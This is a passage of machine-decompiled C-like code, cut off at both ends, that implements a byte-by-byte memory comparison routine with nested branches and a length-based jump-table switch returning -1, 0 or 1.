																										_t1270 = (0 | _t196) * 2 - 1;
																									}
																									__eflags = _t1270;
																									if(_t1270 == 0) {
																										goto L107;
																									}
																								}
																							}
																						}
																					}
																				} else {
																					_t1270 = (_t1053 & 0x000000ff) - (_t1339[0x10] & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t153 = _t1270 > 0;
																						__eflags = _t153;
																						_t1270 = (0 | _t153) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						_t1270 = (_t1353[0x11] & 0x000000ff) - (_t1339[0x11] & 0x000000ff);
																						__eflags = _t1270;
																						if(_t1270 != 0) {
																							__eflags = _t1270;
																							_t159 = _t1270 > 0;
																							__eflags = _t159;
																							_t1270 = (0 | _t159) * 2 - 1;
																						}
																						__eflags = _t1270;
																						if(_t1270 == 0) {
																							_t1270 = (_t1353[0x12] & 0x000000ff) - (_t1339[0x12] & 0x000000ff);
																							__eflags = _t1270;
																							if(_t1270 != 0) {
																								__eflags = _t1270;
																								_t165 = _t1270 > 0;
																								__eflags = _t165;
																								_t1270 = (0 | _t165) * 2 - 1;
																							}
																							__eflags = _t1270;
																							if(_t1270 == 0) {
																								_t1270 = (_t1353[0x13] & 0x000000ff) - (_t1339[0x13] & 0x000000ff);
																								__eflags = _t1270;
																								if(_t1270 != 0) {
																									__eflags = _t1270;
																									_t171 = _t1270 > 0;
																									__eflags = _t171;
																									_t1270 = (0 | _t171) * 2 - 1;
																								}
																								__eflags = _t1270;
																								if(_t1270 == 0) {
																									goto L94;
																								}
																							}
																						}
																					}
																				}
																			} else {
																				_t1270 = (_t1052 & 0x000000ff) - (_t1339[0xc] & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t128 = _t1270 > 0;
																					__eflags = _t128;
																					_t1270 = (0 | _t128) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = (_t1353[0xd] & 0x000000ff) - (_t1339[0xd] & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t134 = _t1270 > 0;
																						__eflags = _t134;
																						_t1270 = (0 | _t134) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						_t1270 = (_t1353[0xe] & 0x000000ff) - (_t1339[0xe] & 0x000000ff);
																						__eflags = _t1270;
																						if(_t1270 != 0) {
																							__eflags = _t1270;
																							_t140 = _t1270 > 0;
																							__eflags = _t140;
																							_t1270 = (0 | _t140) * 2 - 1;
																						}
																						__eflags = _t1270;
																						if(_t1270 == 0) {
																							_t1270 = (_t1353[0xf] & 0x000000ff) - (_t1339[0xf] & 0x000000ff);
																							__eflags = _t1270;
																							if(_t1270 != 0) {
																								__eflags = _t1270;
																								_t146 = _t1270 > 0;
																								__eflags = _t146;
																								_t1270 = (0 | _t146) * 2 - 1;
																							}
																							__eflags = _t1270;
																							if(_t1270 == 0) {
																								goto L81;
																							}
																						}
																					}
																				}
																			}
																		} else {
																			_t1270 = (_t1353[8] & 0x000000ff) - (_t1339[8] & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t103 = _t1270 > 0;
																				__eflags = _t103;
																				_t1270 = (0 | _t103) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = (_t1353[9] & 0x000000ff) - (_t1339[9] & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t109 = _t1270 > 0;
																					__eflags = _t109;
																					_t1270 = (0 | _t109) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = (_t1353[0xa] & 0x000000ff) - (_t1339[0xa] & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t115 = _t1270 > 0;
																						__eflags = _t115;
																						_t1270 = (0 | _t115) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						_t1270 = (_t1353[0xb] & 0x000000ff) - (_t1339[0xb] & 0x000000ff);
																						__eflags = _t1270;
																						if(_t1270 != 0) {
																							__eflags = _t1270;
																							_t121 = _t1270 > 0;
																							__eflags = _t121;
																							_t1270 = (0 | _t121) * 2 - 1;
																						}
																						__eflags = _t1270;
																						if(_t1270 == 0) {
																							goto L68;
																						}
																					}
																				}
																			}
																		}
																	} else {
																		_t1270 = (_t1353[4] & 0x000000ff) - (_t1339[4] & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t77 = _t1270 > 0;
																			__eflags = _t77;
																			_t1270 = (0 | _t77) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = (_t1353[5] & 0x000000ff) - (_t1339[5] & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t83 = _t1270 > 0;
																				__eflags = _t83;
																				_t1270 = (0 | _t83) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = (_t1353[6] & 0x000000ff) - (_t1339[6] & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t89 = _t1270 > 0;
																					__eflags = _t89;
																					_t1270 = (0 | _t89) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = (_t1353[7] & 0x000000ff) - (_t1339[7] & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t95 = _t1270 > 0;
																						__eflags = _t95;
																						_t1270 = (0 | _t95) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L55;
																					}
																				}
																			}
																		}
																	}
																} else {
																	_t1270 = (_t1049 & 0x000000ff) - ( *_t1339 & 0x000000ff);
																	__eflags = _t1270;
																	if(_t1270 != 0) {
																		__eflags = _t1270;
																		_t51 = _t1270 > 0;
																		__eflags = _t51;
																		_t1270 = (0 | _t51) * 2 - 1;
																	}
																	__eflags = _t1270;
																	if(_t1270 == 0) {
																		_t1270 = (_t1353[1] & 0x000000ff) - (_t1339[1] & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t57 = _t1270 > 0;
																			__eflags = _t57;
																			_t1270 = (0 | _t57) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = (_t1353[2] & 0x000000ff) - (_t1339[2] & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t63 = _t1270 > 0;
																				__eflags = _t63;
																				_t1270 = (0 | _t63) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = (_t1353[3] & 0x000000ff) - (_t1339[3] & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t69 = _t1270 > 0;
																					__eflags = _t69;
																					_t1270 = (0 | _t69) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					goto L42;
																				}
																			}
																		}
																	}
																}
																L228:
																_t1021 = _t1270;
																goto L527;
															}
															_t1354 =  &(_t1353[_t1344]);
															_t1340 =  &(_t1339[_t1344]);
															switch( *((intOrPtr*)(_t1344 * 4 +  &M0024F66A))) {
																case 0:
																	L227:
																	_t1270 = 0;
																	__eflags = 0;
																	goto L228;
																case 1:
																	L320:
																	__eax =  *(__edx - 1) & 0x000000ff;
																	__ecx =  *(__esi - 1) & 0x000000ff;
																	__ecx = ( *(__esi - 1) & 0x000000ff) - ( *(__edx - 1) & 0x000000ff);
																	__eflags = __ecx;
																	if(__ecx != 0) {
																		__eax = 0;
																		__eflags = __ecx;
																		__eax = 0 | __ecx > 0x00000000;
																		__ecx = (__ecx > 0) * 2 - 1;
																	}
																	goto L228;
																case 2:
																	L413:
																	__eflags =  *(__esi - 2) -  *(__edx - 2);
																	if( *(__esi - 2) ==  *(__edx - 2)) {
																		goto L227;
																	} else {
																		goto L317;
																	}
																	goto L528;
																case 3:
																	L314:
																	__eax =  *(__edx - 3) & 0x000000ff;
																	__ecx =  *(__esi - 3) & 0x000000ff;
																	__ecx = ( *(__esi - 3) & 0x000000ff) - ( *(__edx - 3) & 0x000000ff);
																	__eflags = __ecx;
																	if(__ecx != 0) {
																		__eax = 0;
																		__eflags = __ecx;
																		_t594 = __ecx > 0;
																		__eflags = _t594;
																		__eax = 0 | _t594;
																		__ecx = _t594 * 2 - 1;
																	}
																	__eflags = __ecx;
																	if(__ecx != 0) {
																		goto L228;
																	} else {
																		L317:
																		__eax =  *(__edx - 2) & 0x000000ff;
																		__ecx =  *(__esi - 2) & 0x000000ff;
																		__ecx = ( *(__esi - 2) & 0x000000ff) - ( *(__edx - 2) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t600 = __ecx > 0;
																			__eflags = _t600;
																			__eax = 0 | _t600;
																			__ecx = _t600 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			goto L320;
																		}
																	}
																	goto L528;
																case 4:
																	L214:
																	_t1063 =  *(_t1354 - 4);
																	__eflags = _t1063 -  *(_t1340 - 4);
																	if(_t1063 ==  *(_t1340 - 4)) {
																		goto L227;
																	} else {
																		_t1270 = (_t1063 & 0x000000ff) - ( *(_t1340 - 4) & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t405 = _t1270 > 0;
																			__eflags = _t405;
																			_t1270 = (0 | _t405) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = ( *(_t1354 - 3) & 0x000000ff) - ( *(_t1340 - 3) & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t411 = _t1270 > 0;
																				__eflags = _t411;
																				_t1270 = (0 | _t411) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = ( *(_t1354 - 2) & 0x000000ff) - ( *(_t1340 - 2) & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t417 = _t1270 > 0;
																					__eflags = _t417;
																					_t1270 = (0 | _t417) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = ( *(_t1354 - 1) & 0x000000ff) - ( *(_t1340 - 1) & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t423 = _t1270 > 0;
																						__eflags = _t423;
																						_t1270 = (0 | _t423) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L227;
																					}
																				}
																			}
																		}
																	}
																	goto L228;
																case 5:
																	L307:
																	__eax =  *(__esi - 5);
																	__eflags =  *(__esi - 5) -  *(__edx - 5);
																	if( *(__esi - 5) ==  *(__edx - 5)) {
																		goto L320;
																	} else {
																		goto L308;
																	}
																	goto L528;
																case 6:
																	L400:
																	__eax =  *(__esi - 6);
																	__eflags =  *(__esi - 6) -  *(__edx - 6);
																	if( *(__esi - 6) ==  *(__edx - 6)) {
																		goto L413;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 6) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 6) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t764 = __ecx > 0;
																			__eflags = _t764;
																			__eax = 0 | _t764;
																			__ecx = _t764 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 5) & 0x000000ff;
																			__eax =  *(__edx - 5) & 0x000000ff;
																			__ecx = ( *(__esi - 5) & 0x000000ff) - ( *(__edx - 5) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t770 = __ecx > 0;
																				__eflags = _t770;
																				__eax = 0 | _t770;
																				__ecx = _t770 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 4) & 0x000000ff;
																				__eax =  *(__edx - 4) & 0x000000ff;
																				__ecx = ( *(__esi - 4) & 0x000000ff) - ( *(__edx - 4) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t776 = __ecx > 0;
																					__eflags = _t776;
																					__eax = 0 | _t776;
																					__ecx = _t776 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 3) & 0x000000ff;
																					__eax =  *(__edx - 3) & 0x000000ff;
																					__ecx = ( *(__esi - 3) & 0x000000ff) - ( *(__edx - 3) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t782 = __ecx > 0;
																						__eflags = _t782;
																						__eax = 0 | _t782;
																						__ecx = _t782 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L413;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 7:
																	L493:
																	__eax =  *(__esi - 7);
																	__eflags =  *(__esi - 7) -  *(__edx - 7);
																	if( *(__esi - 7) ==  *(__edx - 7)) {
																		goto L314;
																	} else {
																		__eax =  *(__edx - 7) & 0x000000ff;
																		__ecx =  *(__esi - 7) & 0x000000ff;
																		__ecx = ( *(__esi - 7) & 0x000000ff) - ( *(__edx - 7) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t943 = __ecx > 0;
																			__eflags = _t943;
																			__eax = 0 | _t943;
																			__ecx = _t943 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 6) & 0x000000ff;
																			__eax =  *(__edx - 6) & 0x000000ff;
																			__ecx = ( *(__esi - 6) & 0x000000ff) - ( *(__edx - 6) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t949 = __ecx > 0;
																				__eflags = _t949;
																				__eax = 0 | _t949;
																				__ecx = _t949 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				L308:
																				__eax =  *(__edx - 5) & 0x000000ff;
																				__ecx =  *(__esi - 5) & 0x000000ff;
																				__ecx = ( *(__esi - 5) & 0x000000ff) - ( *(__edx - 5) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t582 = __ecx > 0;
																					__eflags = _t582;
																					__eax = 0 | _t582;
																					__ecx = _t582 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__eax =  *(__edx - 4) & 0x000000ff;
																					__ecx =  *(__esi - 4) & 0x000000ff;
																					__ecx = ( *(__esi - 4) & 0x000000ff) - ( *(__edx - 4) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t588 = __ecx > 0;
																						__eflags = _t588;
																						__eax = 0 | _t588;
																						__ecx = _t588 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L314;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 8:
																	L201:
																	_t1062 =  *(_t1354 - 8);
																	__eflags = _t1062 -  *(_t1340 - 8);
																	if(_t1062 ==  *(_t1340 - 8)) {
																		goto L214;
																	} else {
																		_t1270 = (_t1062 & 0x000000ff) - ( *(_t1340 - 8) & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t380 = _t1270 > 0;
																			__eflags = _t380;
																			_t1270 = (0 | _t380) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = ( *(_t1354 - 7) & 0x000000ff) - ( *(_t1340 - 7) & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t386 = _t1270 > 0;
																				__eflags = _t386;
																				_t1270 = (0 | _t386) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = ( *(_t1354 - 6) & 0x000000ff) - ( *(_t1340 - 6) & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t392 = _t1270 > 0;
																					__eflags = _t392;
																					_t1270 = (0 | _t392) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = ( *(_t1354 - 5) & 0x000000ff) - ( *(_t1340 - 5) & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t398 = _t1270 > 0;
																						__eflags = _t398;
																						_t1270 = (0 | _t398) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L214;
																					}
																				}
																			}
																		}
																	}
																	goto L228;
																case 9:
																	L294:
																	__eax =  *(__esi - 9);
																	__eflags =  *(__esi - 9) -  *(__edx - 9);
																	if( *(__esi - 9) ==  *(__edx - 9)) {
																		goto L307;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 9) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 9) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t556 = __ecx > 0;
																			__eflags = _t556;
																			__eax = 0 | _t556;
																			__ecx = _t556 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 8) & 0x000000ff;
																			__eax =  *(__edx - 8) & 0x000000ff;
																			__ecx = ( *(__esi - 8) & 0x000000ff) - ( *(__edx - 8) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t562 = __ecx > 0;
																				__eflags = _t562;
																				__eax = 0 | _t562;
																				__ecx = _t562 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 7) & 0x000000ff;
																				__eax =  *(__edx - 7) & 0x000000ff;
																				__ecx = ( *(__esi - 7) & 0x000000ff) - ( *(__edx - 7) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t568 = __ecx > 0;
																					__eflags = _t568;
																					__eax = 0 | _t568;
																					__ecx = _t568 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 6) & 0x000000ff;
																					__eax =  *(__edx - 6) & 0x000000ff;
																					__ecx = ( *(__esi - 6) & 0x000000ff) - ( *(__edx - 6) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t574 = __ecx > 0;
																						__eflags = _t574;
																						__eax = 0 | _t574;
																						__ecx = _t574 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L307;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0xa:
																	L387:
																	__eax =  *(__esi - 0xa);
																	__eflags =  *(__esi - 0xa) -  *(__edx - 0xa);
																	if( *(__esi - 0xa) ==  *(__edx - 0xa)) {
																		goto L400;
																	} else {
																		__eax =  *(__edx - 0xa) & 0x000000ff;
																		__ecx =  *(__esi - 0xa) & 0x000000ff;
																		__ecx = ( *(__esi - 0xa) & 0x000000ff) - ( *(__edx - 0xa) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t739 = __ecx > 0;
																			__eflags = _t739;
																			__eax = 0 | _t739;
																			__ecx = _t739 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 9) & 0x000000ff;
																			__eax =  *(__edx - 9) & 0x000000ff;
																			__ecx = ( *(__esi - 9) & 0x000000ff) - ( *(__edx - 9) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t745 = __ecx > 0;
																				__eflags = _t745;
																				__eax = 0 | _t745;
																				__ecx = _t745 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 8) & 0x000000ff;
																				__eax =  *(__edx - 8) & 0x000000ff;
																				__ecx = ( *(__esi - 8) & 0x000000ff) - ( *(__edx - 8) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t751 = __ecx > 0;
																					__eflags = _t751;
																					__eax = 0 | _t751;
																					__ecx = _t751 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 7) & 0x000000ff;
																					__eax =  *(__edx - 7) & 0x000000ff;
																					__ecx = ( *(__esi - 7) & 0x000000ff) - ( *(__edx - 7) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t757 = __ecx > 0;
																						__eflags = _t757;
																						__eax = 0 | _t757;
																						__ecx = _t757 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L400;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0xb:
																	L480:
																	__eax =  *(__esi - 0xb);
																	__eflags =  *(__esi - 0xb) -  *(__edx - 0xb);
																	if( *(__esi - 0xb) ==  *(__edx - 0xb)) {
																		goto L493;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0xb) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0xb) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t917 = __ecx > 0;
																			__eflags = _t917;
																			__eax = 0 | _t917;
																			__ecx = _t917 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0xa) & 0x000000ff;
																			__eax =  *(__edx - 0xa) & 0x000000ff;
																			__ecx = ( *(__esi - 0xa) & 0x000000ff) - ( *(__edx - 0xa) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t923 = __ecx > 0;
																				__eflags = _t923;
																				__eax = 0 | _t923;
																				__ecx = _t923 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 9) & 0x000000ff;
																				__eax =  *(__edx - 9) & 0x000000ff;
																				__ecx = ( *(__esi - 9) & 0x000000ff) - ( *(__edx - 9) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t929 = __ecx > 0;
																					__eflags = _t929;
																					__eax = 0 | _t929;
																					__ecx = _t929 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 8) & 0x000000ff;
																					__eax =  *(__edx - 8) & 0x000000ff;
																					__ecx = ( *(__esi - 8) & 0x000000ff) - ( *(__edx - 8) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t935 = __ecx > 0;
																						__eflags = _t935;
																						__eax = 0 | _t935;
																						__ecx = _t935 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L493;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0xc:
																	L188:
																	_t1061 =  *(_t1354 - 0xc);
																	__eflags = _t1061 -  *(_t1340 - 0xc);
																	if(_t1061 ==  *(_t1340 - 0xc)) {
																		goto L201;
																	} else {
																		_t1270 = (_t1061 & 0x000000ff) - ( *(_t1340 - 0xc) & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t355 = _t1270 > 0;
																			__eflags = _t355;
																			_t1270 = (0 | _t355) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = ( *(_t1354 - 0xb) & 0x000000ff) - ( *(_t1340 - 0xb) & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t361 = _t1270 > 0;
																				__eflags = _t361;
																				_t1270 = (0 | _t361) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = ( *(_t1354 - 0xa) & 0x000000ff) - ( *(_t1340 - 0xa) & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t367 = _t1270 > 0;
																					__eflags = _t367;
																					_t1270 = (0 | _t367) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = ( *(_t1354 - 9) & 0x000000ff) - ( *(_t1340 - 9) & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t373 = _t1270 > 0;
																						__eflags = _t373;
																						_t1270 = (0 | _t373) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L201;
																					}
																				}
																			}
																		}
																	}
																	goto L228;
																case 0xd:
																	L281:
																	__eax =  *(__esi - 0xd);
																	__eflags =  *(__esi - 0xd) -  *(__edx - 0xd);
																	if( *(__esi - 0xd) ==  *(__edx - 0xd)) {
																		goto L294;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0xd) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0xd) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t531 = __ecx > 0;
																			__eflags = _t531;
																			__eax = 0 | _t531;
																			__ecx = _t531 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0xc) & 0x000000ff;
																			__eax =  *(__edx - 0xc) & 0x000000ff;
																			__ecx = ( *(__esi - 0xc) & 0x000000ff) - ( *(__edx - 0xc) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t537 = __ecx > 0;
																				__eflags = _t537;
																				__eax = 0 | _t537;
																				__ecx = _t537 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0xb) & 0x000000ff;
																				__eax =  *(__edx - 0xb) & 0x000000ff;
																				__ecx = ( *(__esi - 0xb) & 0x000000ff) - ( *(__edx - 0xb) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t543 = __ecx > 0;
																					__eflags = _t543;
																					__eax = 0 | _t543;
																					__ecx = _t543 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0xa) & 0x000000ff;
																					__eax =  *(__edx - 0xa) & 0x000000ff;
																					__ecx = ( *(__esi - 0xa) & 0x000000ff) - ( *(__edx - 0xa) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t549 = __ecx > 0;
																						__eflags = _t549;
																						__eax = 0 | _t549;
																						__ecx = _t549 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L294;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0xe:
																	L374:
																	__eax =  *(__esi - 0xe);
																	__eflags =  *(__esi - 0xe) -  *(__edx - 0xe);
																	if( *(__esi - 0xe) ==  *(__edx - 0xe)) {
																		goto L387;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0xe) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0xe) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t713 = __ecx > 0;
																			__eflags = _t713;
																			__eax = 0 | _t713;
																			__ecx = _t713 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0xd) & 0x000000ff;
																			__eax =  *(__edx - 0xd) & 0x000000ff;
																			__ecx = ( *(__esi - 0xd) & 0x000000ff) - ( *(__edx - 0xd) & 0x000000ff);
